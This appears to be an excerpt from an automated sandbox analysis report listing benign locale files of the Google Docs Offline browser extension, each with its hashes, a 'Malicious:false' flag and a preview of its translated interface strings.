                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1305
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                    MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                    SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                    SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                    SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):911
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                    MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                    SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                    SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                    SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):939
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                    MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                    SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                    SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                    SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):977
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                    MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                    SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                    SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                    SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):972
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                    MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                    SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                    SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                    SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):990
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                    MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                    SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                    SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                    SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1658
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                    MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                    SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                    SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                    SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1672
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                    MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                    SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                    SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                    SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):935
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                    MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                    SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                    SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                    SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1065
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                    MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                    SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                    SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                    SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2771
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                    MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                    SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                    SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                    SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):858
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                    MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                    SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                    SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                    SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):954
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                    MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                    SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                    SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                    SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

